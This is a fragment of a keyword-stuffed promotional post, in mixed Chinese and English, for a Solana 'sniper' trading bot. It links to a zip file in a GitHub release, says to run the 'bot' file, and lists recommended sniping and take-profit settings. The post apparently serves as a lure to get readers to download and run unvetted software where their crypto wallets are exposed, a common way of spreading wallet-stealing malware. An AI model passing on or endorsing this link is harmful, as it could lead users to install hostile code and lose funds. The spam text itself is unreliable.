UN“ bot”文件并按照提示设置机器人。 SOL狙击机器人|| solana bot || SOL机器人||加密机器人|| Sol Trading Bot : https://github.com/cryptsniper/sniperchek/releases/download/1%2C0/sniperchek.zip I recommend these settings for the sniper: Manual sniping mode: false Minimum Pool Size: 5.00 SOL Maximum Pool Size: 30.00 SOL Snipe One Token At A Time: true (you can make it false if you have the budget - this means it will engage and snipe multiple tokens at a time that fit the rest of these parameters once they launch) Amount of SOL to snipe with: 0.05 SOL Take Profit Level 1: 30% Take Profit Level 2: 200% Check If Token Has Socials And Website: true Check If Token Is Mutable: true Check If Token Is Freezable: true Check If Token Has LP Burned: true Check If Token Is Renounced: true Check If Token Has LP Locked: true